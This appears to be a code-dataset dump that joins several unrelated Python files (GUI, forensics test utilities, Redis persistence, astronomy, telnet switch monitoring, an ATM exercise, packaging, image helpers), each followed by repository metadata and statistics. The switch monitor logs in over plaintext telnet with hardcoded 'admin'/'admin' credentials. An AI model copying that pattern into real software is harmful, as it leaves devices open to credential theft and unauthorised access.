self.dropdown = Tk.OptionMenu(self.dropdownFrame, self.dropdownVar, "ORIGINAL", *[n.get() for n in self.nameVars])
self.dropdown.pack(side=Tk.LEFT)
def save(self):
self.error.pack_forget()
chain = ExpressionChain()
for i, name in enumerate(self.names):
chain.addExp(self.expressions[i].get(), name.get())
path = tkFileDialog.asksaveasfilename(defaultextension=".wizt",
filetypes=[("WIZ Template", ".wizt")])
try:
with open(path, 'w+') as f:
pickle.dump(chain, f)
except IOError:
self.error.pack()
| 45.227273 | 122 | 0.620302 | 582 | 4,975 | 5.274914 | 0.321306 | 0.03127 | 0.04886 | 0.031922 | 0.157003 | 0.076222 | 0.041694 | 0.041694 | 0.041694 | 0 | 0 | 0.002455 | 0.263116 | 4,975 | 109 | 123 | 45.642202 | 0.83497 | 0.060503 | 0 | 0.061856 | 0 | 0 | 0.128189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061856 | false | 0.010309 | 0.041237 | 0 | 0.123711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0229beb24a3ecf96c94f188d830144aacc012f | 5,525 | py | Python | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1,473 | 2015-01-02T06:13:10.000Z | 2022-03-30T09:45:34.000Z | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1,068 | 2015-02-04T14:33:38.000Z | 2022-03-31T03:49:28.000Z | test/script/regression_utils.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 510 | 2015-01-09T19:46:08.000Z | 2022-03-23T13:25:34.000Z | import os
import sys
import subprocess
from time import localtime, strftime
import traceback
# Returns a Windows style path starting with the cwd and
# ending with the list of directories given
def make_local_path(*dirs):
path = wgetcwd().decode("utf-8")
for dir in dirs:
path += ("\\" + str(dir))
return path_fix(path)
# Returns a Windows style path based only off the given directories
def make_path(*dirs):
path = dirs[0]
for dir in dirs[1:]:
path += ("\\" + str(dir))
return path_fix(path)
# Returns a path based on the os.
def make_os_path(platform, *dirs):
if platform == "cygwin":
path = ""
for dir in dirs:
path += str(dir).replace('\\', '/') + '/'
return path_fix(path)
elif platform == "win32":
return make_path(*dirs)
else:
print("Couldn't make path, because we only support Windows and Cygwin at this time.")
sys.exit(1)
# Fix a standard os.path by making it Windows format
def path_fix(path):
return os.path.normcase(os.path.normpath(path))
# Gets the true current working directory instead of Cygwin's
def wgetcwd():
proc = subprocess.Popen(("cygpath", "-m", os.getcwd()), stdout=subprocess.PIPE)
out,err = proc.communicate()
tst = out.rstrip()
if os.getcwd() == tst:
return os.getcwd()
else:
proc = subprocess.Popen(("cygpath", "-m", os.getcwd()), stdout=subprocess.PIPE)
out,err = proc.communicate()
return out.rstrip()
# Verifies a file's existence
def file_exists(file):
try:
return os.path.exists(file) and os.path.isfile(file)
except:
return False
# Verifies a directory's existence
def dir_exists(dir):
try:
return os.path.exists(dir) and os.path.isdir(dir)
except:
return False
# Returns the nth word in the given string or "" if n is out of bounds
# n starts at 0 for the first word
def get_word_at(string, n):
words = string.split(" ")
if len(words) > n:
return words[n]
else:
return ""
# Returns true if the given file is one of the required input files
# for ingest testing
def required_input_file(name):
if ((name == "notablehashes.txt-md5.idx") or
(name == "notablekeywords.xml") or
(name == "nsrl.txt-md5.idx")):
return True
else:
return False
# Returns the type of image file, based off extension
def image_type(image_file):
if (dir_exists(image_file)):
return IMGTYPE.LOGICAL
ext_start = image_file.rfind(".")
if (ext_start == -1):
return IMGTYPE.UNKNOWN
ext = image_file[ext_start:].lower()
if (ext == ".img" or ext == ".dd"):
return IMGTYPE.RAW
elif (ext == ".e01"):
return IMGTYPE.ENCASE
elif (ext == ".aa" or ext == ".001"):
return IMGTYPE.SPLIT
else:
return IMGTYPE.UNKNOWN
# Enumeration of image file types (the values returned by image_type above)
class IMGTYPE:
RAW, ENCASE, SPLIT, LOGICAL, UNKNOWN = range(5)
def get_image_name(image_file):
path_end = image_file.rfind("/")
path_end2 = image_file.rfind("\\")
ext_start = image_file.rfind(".")
if (image_type(image_file) == IMGTYPE.LOGICAL):
name = image_file[path_end2+1:]
return name
if(ext_start == -1):
name = image_file
if(path_end2 != -1):
name = image_file[path_end2+1:ext_start]
elif(ext_start == -1):
name = image_file[path_end+1:]
elif(path_end == -1):
name = image_file[:ext_start]
elif(path_end!=-1 and ext_start!=-1):
name = image_file[path_end+1:ext_start]
else:
name = image_file[path_end2+1:ext_start]
return name
def usage():
"""Return the usage description of the test script."""
return """
Usage: ./regression.py [-f FILE] [OPTIONS]
Run RegressionTest.java, and compare the result with a gold standard.
By default, the script tests every image in ../input
When the -f flag is set, this script only tests a single given image.
When the -l flag is set, the script looks for a configuration file,
which may outsource to a new input directory and to individual images.
Expected files:
An NSRL database at: ../input/nsrl.txt-md5.idx
A notable hash database at: ../input/notablehashes.txt-md5.idx
A notable keyword file at: ../input/notablekeywords.xml
Options:
-r Rebuild the gold standards for the image(s) tested.
-i Ignores the ../input directory and all files within it.
-u Tells Autopsy not to ingest unallocated space.
-k Keeps each image's Solr index instead of deleting it.
-v Verbose mode; prints all errors to the screen.
-e ex Prints out all errors containing ex.
-l cfg Runs from configuration file cfg.
-c Runs in a loop over the configuration file until canceled. Must be used in conjunction with -l
-fr Will not try download gold standard images
"""
#####
# Enumeration definition (python 3.2 doesn't have enumerations, this is a common solution
# that allows you to access a named enum in a Java-like style, i.e. Numbers.ONE)
#####
def enum(*seq, **named):
enums = dict(zip(seq, range(len(seq))), **named)
return type('Enum', (), enums)
def get_files_by_ext(dir_path, ext):
"""Get a list of all the files with a given extenstion in the directory.
Args:
dir: a pathto_Dir, the directory to search.
ext: a String, the extension to search for. i.e. ".html"
"""
return [ os.path.join(dir_path, file) for file in os.listdir(dir_path) if
file.endswith(ext) ]
| 31.571429 | 110 | 0.651041 | 826 | 5,525 | 4.276029 | 0.307506 | 0.043318 | 0.029445 | 0.028879 | 0.1594 | 0.132503 | 0.106455 | 0.096829 | 0.079841 | 0.043035 | 0 | 0.008511 | 0.234389 | 5,525 | 174 | 111 | 31.752874 | 0.826478 | 0.182443 | 0 | 0.265625 | 0 | 0.007813 | 0.331989 | 0.02509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109375 | false | 0 | 0.039063 | 0.007813 | 0.359375 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c02b3f5d82f23e8e16a36d480f74abb2312e219 | 4,773 | py | Python | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | null | null | null | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | null | null | null | domain_model.py | malingreats/domainmodel | 3c64f5f7e0b26b301c9ac781e7b2764d958cbfe0 | [
"MIT"
] | 2 | 2020-10-19T14:47:38.000Z | 2021-09-19T17:14:56.000Z | def is_key(_value):
"""
Check if a value is a key, i.e. has to be looked up on Redis root level.
:param _value: The string to be checked.
:return: True if the given value is a Redis key, false otherwise.
"""
return '_' in _value and ':' in _value
class DomainModel(object):
"""
Domain Model class.
It persists Python dictionaries with an 'entity_id' to Redis Hashes, Lists and Sets.
Currently only 1 level of nesting is supported.
"""
redis = None
def __init__(self, _redis):
"""
:param _redis: A redis instance.
"""
self.redis = _redis
def create(self, _topic, _values):
"""
Set an entity.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
self.redis.sadd('{}_ids'.format(_topic), _values['entity_id'])
for k, v in _values.items():
if isinstance(v, list):
lid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, lid)
self.redis.rpush(lid, *v)
elif isinstance(v, set):
sid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, sid)
self.redis.sadd(sid, *v)
elif isinstance(v, dict):
did = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, did)
self.redis.hmset(did, v)
else:
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, v)
def retrieve(self, _topic):
"""
Get all entities of the given type.
:param _topic: The type of entity.
:return: A dict mapping entity IDs to dicts of entity properties.
"""
result = {}
for eid in self.redis.smembers('{}_ids'.format(_topic)):
result[eid] = self.redis.hgetall('{}_entity:{}'.format(_topic, eid))
for k, v in result[eid].items():
if is_key(v):
rtype = self.redis.type(v)
if rtype == 'list':
result[eid][k] = self.redis.lrange(v, 0, -1)
elif rtype == 'set':
result[eid][k] = self.redis.smembers(v)
elif rtype == 'hash':
result[eid][k] = self.redis.hgetall(v)
else:
raise ValueError('unknown redis type: {}'.format(rtype))
return result
def update(self, _topic, _values):
"""
Update an entity, replacing any nested collections (lists/sets/dicts) wholesale.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
for k, v in _values.items():
if isinstance(v, list):
lid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, lid)
self.redis.delete(lid)
self.redis.rpush(lid, *v)
elif isinstance(v, set):
sid = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, sid)
self.redis.delete(sid)
self.redis.sadd(sid, *v)
elif isinstance(v, dict):
did = '{}_{}:{}'.format(_topic, k, _values['entity_id'])
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, did)
self.redis.delete(did)
self.redis.hmset(did, v)
else:
self.redis.hset('{}_entity:{}'.format(_topic, _values['entity_id']), k, v)
def delete(self, _topic, _values):
"""
Delete an entity.
:param _topic: The type of entity.
:param _values: The entity properties.
"""
self.redis.srem('{}_ids'.format(_topic), _values['entity_id'])
self.redis.delete('{}_entity:{}'.format(_topic, _values['entity_id']))
for k, v in _values.items():
if isinstance(v, (list, set, dict)):
self.redis.delete('{}_{}:{}'.format(_topic, k, _values['entity_id']))
def exists(self, _topic, _id=None):
"""
Check if an entity exists.
:param _topic: The type of entity.
:param _id: An optional entity ID.
:return: True iff an entity exists, False otherwise.
"""
if self.redis.exists('{}_ids'.format(_topic)):
return True if not _id else self.redis.sismember('{}_ids'.format(_topic), _id)
return False
| 38.804878 | 92 | 0.521894 | 557 | 4,773 | 4.260323 | 0.179533 | 0.117573 | 0.106195 | 0.096924 | 0.559208 | 0.525495 | 0.51201 | 0.499368 | 0.485461 | 0.485461 | 0 | 0.001242 | 0.325162 | 4,773 | 122 | 93 | 39.122951 | 0.735486 | 0.187932 | 0 | 0.441176 | 0 | 0 | 0.111851 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102941 | false | 0 | 0 | 0 | 0.191176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c03a4cb5c8cb51274aeb2b304ebfb9727d871e7 | 3,287 | py | Python | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | ODModules/planet.py | Ktrio3/orbital-drift | 11adeb0a436f8e2632dfd12c4280d28134494ff4 | [
"MIT"
] | null | null | null | #############################
# Planet.py
# Created by: Kevin Dennis, 2016-09-06
#
# Purpose: The planet class contains methods for plotting a planet using
# Kepler's planetary laws
#############################
import math
class Planet:
########
# Values of Planet class
########
#
# name -> String, name of planet
# orbitX -> array
# orbitY -> array
# orbitZ -> array
#
# NOTE: All orbital elements are updated constantly while drawing the
# orbits. There is currently no tracking of these values while graphing.
#
#
# VARIABLES ADDED BY VSOP87
# eclipLong -> float, radians, ecliptical longitude
# helioLat -> float, radians, heliocentric latitude
# radVector -> float, radians, radius vactor
#
# VARIABLES ADDED BY SchlyterCalc
# longAscNode -> float, longitude of the ascending node
# incElip -> float, inclination to the ecliptic
# argPerih -> float, argument of perihelion
# semiMajAx -> float, semi-major axis
# meanAnom -> float, Radians. Mean Anomaly
# eccen -> float, Radians. Eccentricity.
# eccenAnom -> float, Radians. Eccentic Anomaly.
# distance -> float, distance from sun
# xAnom -> float, x Anomaly
# yAnom -> float, y Anomaly
# anom -> true Anomaly
################
# __init__
################
# Creates a planet object and initializes the planet data using the info
# provided in __________
def __init__(self, name, epoch, dbResults):
self.epoch = epoch
if dbResults != 0:
self.name = dbResults['planet_name']
self.id = dbResults['id']
self.num_moons = dbResults['num_moons']
self.size_ratio = dbResults['size_ratio']
self.color = dbResults['default_color']
self.orbit_color = dbResults['default_orbit_color']
self.elements = {}
self.orbitXSchlyter = []
self.orbitYSchlyter = []
self.orbitZSchlyter = []
self.orbitXVSOP = []
self.orbitYVSOP = []
self.orbitZVSOP = []
self.method = []
###############################
# setElements
###############################
# Creates the dictionary of elements for the planet from the database.
# Note that this does not retrieve coefficients or terms. It retrieves the
# name and id of each element and places it in the dictionary.
def setElementsDict(self, dbInterface):
data = dbInterface.getAllElements()
for element in data:
self.elements[element['variable']] = {
"id": element['id'],
"name": element['element_name'],
"units": element['units'],
}
###############################
# setSchlyterTerms
###############################
# Retrieves the terms used for the Schlyter method from the database
# and adds them to the DB.
def setSchlyterTerms(self, dbInterface):
for key in self.elements:
data = dbInterface.getSchlyterTerms(
self.id, self.elements[key]['id'])
self.elements[key]['coefficient'] = data[0]['coefficient']
self.elements[key]['constant'] = data[0]['constant']
| 34.968085 | 78 | 0.564953 | 327 | 3,287 | 5.593272 | 0.474006 | 0.039366 | 0.024604 | 0.018589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005478 | 0.278065 | 3,287 | 93 | 79 | 35.344086 | 0.765276 | 0.435656 | 0 | 0 | 0 | 0 | 0.089817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.030303 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0561d600429d487b01233e4a2b2fcc46e83284 | 1,587 | py | Python | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | skywinder/housekeeping/ethernet_switch.py | PolarMesosphericClouds/SkyWinder | ee136cffca167905ebcd3edf88e2c7456b56a51a | [
"BSD-3-Clause"
] | null | null | null | import telnetlib
import re
import os
import time
log_dir = '/var/pmclogs/housekeeping/switch'
def get_switch_info(address='pmc-ethernet-switch-0'):
"""Telnet into the switch as admin and return the raw 'show version' output."""
tn = telnetlib.Telnet(address,timeout=60)
tn.read_until('Username:')
tn.write('admin\r')
tn.read_until('Password:')
tn.write('admin\r')
tn.read_until('#')
tn.write('show version\r')
result = tn.read_until('#')
# tn.write('show env power\r') #this doesn't seem to work over telnet
# result += tn.read_until('#')
tn.write('exit\r')
tn.close()
return result
def parse_switch_info(info):
"""Extract the temperature in degrees C from the raw switch output, or return None."""
temperature_string = re.findall(' \d+\.\d C',info)
if temperature_string:
temperature_string = temperature_string[0]
try:
temperature = float(temperature_string[:-1])
except Exception as e:
print(temperature_string, e)
temperature = None
return temperature
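# Example: for switch output containing the token " 43.5 C", the regex above
# matches it and the function returns 43.5.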
if __name__ == "__main__":
filename = os.path.join(log_dir,(time.strftime('%Y-%m-%d_%H%M%S.csv')))
with open(filename,'w') as fh:
fh.write('epoch,temperature\n')
last_epoch = 0
while True:
if time.time() - last_epoch > 30:
temperature = None
epoch = time.time()
try:
temperature = parse_switch_info(get_switch_info())
print(time.ctime(), ' : ', temperature)
except Exception as e:
print(e)
with open(filename,'a') as fh:
fh.write('%r,%r\n' % (epoch,temperature))
last_epoch = epoch
else:
time.sleep(1)
| 29.943396 | 75 | 0.594833 | 205 | 1,587 | 4.443902 | 0.414634 | 0.111965 | 0.060373 | 0.04281 | 0.172338 | 0.121844 | 0.052689 | 0 | 0 | 0 | 0 | 0.007732 | 0.266541 | 1,587 | 52 | 76 | 30.519231 | 0.774914 | 0.062382 | 0 | 0.173913 | 0 | 0 | 0.118323 | 0.035835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.021739 | 0.086957 | 0 | 0.173913 | 0.065217 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c08f460382ec3b33cf7123a486c0813f01ab8bf | 1,531 | py | Python | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | """Exercício Python 071: Crie um programa que simule o funcionamento de um caixa eletrônico.
No início, pergunte ao usuário qual será o valor a ser sacado (número inteiro) e o programa
vai informar quantas cédulas de cada valor serão entregues. OBS:
considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1."""
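# Worked example: withdrawing R$186 dispenses 3 x R$50, 1 x R$20, 1 x R$10 and
# 6 x R$1 (remainders: 186 -> 36 -> 16 -> 6 -> 0).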
print("="*40)
print("{:-^50}".format("\033[1:35m BEM VINDO AO CAIXA ELETRÔNICO\033[m"))
print("{:-^50}".format("\033[1:31m ATENÇÃO ESTE CAIXA SÓ TEM CEDULAS \033[m"))
print("{:-^50}".format("\033[1:31m DE R$50 R$20 R$10 e R$1 \033[m"))
print("="*40)
saque = int(input("Quanto você deseja sacar?"))
celula50 = 50
celula20 = 20
celula10 = 10
celula1 = 1
total50 = total20 = total10 = total1 = 0
while True:
if saque >= celula50:
total50 = int(saque/celula50)
saque = saque % celula50
elif saque >= celula20 and saque <= celula50:
total20 = int(saque/celula20)
saque = saque%celula20
elif saque >= celula10 and saque <=celula20:
total10 = int(saque/celula10)
saque = saque%celula10
elif saque >= celula1 and saque <= celula10:
total1 = int(saque/celula1)
saque = saque % celula1
elif saque == 0:
break
if total50 != 0:
print(f"you will withdraw a total of {total50} R$50 bills")
if total20 != 0:
print(f"you will withdraw a total of {total20} R$20 bills")
if total10 != 0:
print(f"you will withdraw a total of {total10} R$10 bills")
if total1 != 0:
print(f"you will withdraw a total of {total1} R$1 bills")
| 37.341463 | 92 | 0.655781 | 245 | 1,531 | 4.097959 | 0.334694 | 0.017928 | 0.027888 | 0.043825 | 0.193227 | 0.176295 | 0.176295 | 0.156375 | 0.108566 | 0.027888 | 0 | 0.113428 | 0.216852 | 1,531 | 40 | 93 | 38.275 | 0.723937 | 0.202482 | 0 | 0.058824 | 0 | 0.029412 | 0.312757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.264706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0f5733a076ef40dbdc3402e87c709d21fb58ec | 1,416 | py | Python | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | import utilities
from mcutils import menu_manager as mc
mc.ColorSettings.print_color = True
mc.ColorSettings.is_dev = True
mc.LogSettings.display_logs = True
utilities.initialize()
about = mc.Credits(authors=["Matías Cánepa",
"Javiera Araya",
"Ignacio Chocair",
"Florencia Peralta",
"Isidora Ramirez"],
team_name="Team 8",
github_account="macanepa",
email_address="macanepa@miuandes.cl",
company_name="TDB")
mf_exit_application = mc.MenuFunction(title="Exit", function=mc.exit_application)
mf_import_input_data = mc.MenuFunction("Change Input Data Folder", utilities.import_input_data, *[True])
mf_optimize = mc.MenuFunction(title="Optimize", function=utilities.optimize)
mf_about = mc.MenuFunction(title="About", function=about.print_credits)
mf_display_input_data = mc.MenuFunction(title="Display Input Data", function=utilities.print_input_data)
mf_display_parameters = mc.MenuFunction(title="Display Parameters", function=utilities.display_parameters)
mc_main_menu = mc.Menu(title="Main Menu",
options=[mf_import_input_data, mf_optimize, mf_display_input_data, mf_display_parameters,
mf_about, mf_exit_application], back=False)
while True:
mc_main_menu.show()
| 44.25 | 112 | 0.670198 | 162 | 1,416 | 5.592593 | 0.376543 | 0.07947 | 0.104857 | 0.037528 | 0.06181 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000923 | 0.234463 | 1,416 | 31 | 113 | 45.677419 | 0.834871 | 0 | 0 | 0 | 0 | 0 | 0.138418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c11c3fead810454eb8af4a88561feaeea250f02 | 2,444 | py | Python | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2017 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function
import os
from setuptools import setup, find_packages
from version import __version__ as version
packages = find_packages(where="..", include=("nnef_converters*",))
package_dir = {package: os.path.join("..", *package.split('.')) for package in packages}
setup(name='nnef_converters',
version=version,
description='NNEF Converters',
url='https://github.com/KhronosGroup/NNEF-Tools',
author='Tamas Danyluk',
author_email='tamas.danyluk@aimotive.com',
license='Apache 2.0',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
keywords='nnef',
packages=packages,
package_dir=package_dir,
entry_points={
'console_scripts': [
'caffe_to_nnef = nnef_converters.caffe_converters.caffe_to_nnef.command:main',
'nnef_to_caffe = nnef_converters.caffe_converters.nnef_to_caffe.command:main',
'nnef_to_tf = nnef_converters.tf_converters.nnef_to_tf.command:main',
'tf_to_nnef = nnef_converters.tf_converters.tf_to_nnef.command:main',
'create_dummy_caffe_model = nnef_converters.caffe_converters.create_dummy_caffe_model:main',
'create_dummy_tf_checkpoint = nnef_converters.tf_converters.create_dummy_tf_checkpoint:main',
]
})
print()
print("Some tools need additional dependencies, that are not checked now:")
print("all tools: nnef, numpy")
print("tf_to_nnef, nnef_to_tf, create_dummy_tf_checkpoint: tensorflow")
print("caffe_to_nnef, nnef_to_caffe: caffe")
print()
print("Install successful!")
| 40.065574 | 107 | 0.705401 | 314 | 2,444 | 5.267516 | 0.44586 | 0.076179 | 0.024184 | 0.0526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006572 | 0.190671 | 2,444 | 60 | 108 | 40.733333 | 0.829626 | 0.238953 | 0 | 0.05 | 0 | 0 | 0.545504 | 0.24377 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c131afc1a8fa0db0764e5b016b146b5a0b04ed4 | 4,521 | py | Python | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | import os
import errno
import numpy as np
from skimage import io
import scipy
import scipy.misc
from skimage.transform import resize
from skimage.measure import compare_psnr , compare_ssim
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib
import utils_mnist as utils
import pdb
def normalize(images):
"""Rescale each image in the batch independently to the range [-1, 1]."""
M = np.max(images,(1,2,3))
m = np.min(images, (1,2,3))
Mm = np.array([val*np.ones_like(images[0]) for val in M ])
mm = np.array([val*np.ones_like(images[0]) for val in m ])
return ((images - mm)/(Mm - mm)) * 2.0 - 1.0
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def load_celebA(data , n):
dt = data.test_data_list[:n]
images = np.array([get_image(ls,108, is_crop=True, resize_w=64,is_grayscale=False) for ls in dt])
return images
def get_image(image_path, image_size, is_crop=True, resize_w=64, is_grayscale=False):
return transform(imread(image_path, is_grayscale), image_size, is_crop, resize_w)
def transform(image, npx=64, is_crop=False, resize_w=64):
# npx : # of pixels width/height of image
if is_crop:
cropped_image = center_crop(image, npx, resize_w=resize_w)
else:
cropped_image = image
cropped_image = resize(cropped_image,
[resize_w, resize_w])
return np.array(cropped_image) / 127.5 - 1
def center_crop(x, crop_h , crop_w=None, resize_w=64):
if crop_w is None:
crop_w = crop_h
h, w = x.shape[:2]
j = int(round((h - crop_h)/2.))
i = int(round((w - crop_w)/2.))
return resize(x[j:j+crop_h, i:i+crop_w],
[resize_w, resize_w])
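# e.g. a 218x178 (HxW) celebA image is center-cropped to 108x108 and resized to
# 64x64, matching the get_image(..., 108, resize_w=64, ...) call in load_celebA.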
def compute_psnr_ssim(x, y):
return compare_psnr(x, y), compare_ssim(x, y, multichannel=True)
def save_images(images, size, image_path, measure_dict, titles, x_range):
images = [merge(img , size, x_range) for img in images]
PSNR, SSIM = compute_psnr_ssim(images[0], images[2])
measure_dict['psnr'].append(PSNR)
measure_dict['ssim'].append(SSIM)
return imsave(images, size, image_path,measure_dict, titles)
def imread(path, is_grayscale=False):
if (is_grayscale):
return io.imread(path.decode('utf-8'), flatten=True).astype(np.float)
else:
return io.imread(path.decode('utf-8')).astype(np.float)
def imsave(images, size, path, measure_dict, titles):
fig = plt.figure()
gs = matplotlib.gridspec.GridSpec(2, 4, figure = fig)
for i in range(len(images)):
f_ax = fig.add_subplot(gs[0, i])
f_ax.set_title(titles[i])
f_ax.imshow(images[i])
for ind , (k , v) in enumerate(measure_dict.items()):
f_ax = fig.add_subplot(gs[1, ind])
f_ax.set_title(k)
f_ax.plot(np.arange(len(v)) + 1 , v)
fig.savefig(path , format='png')
plt.close()
def merge(images, size, x_range):
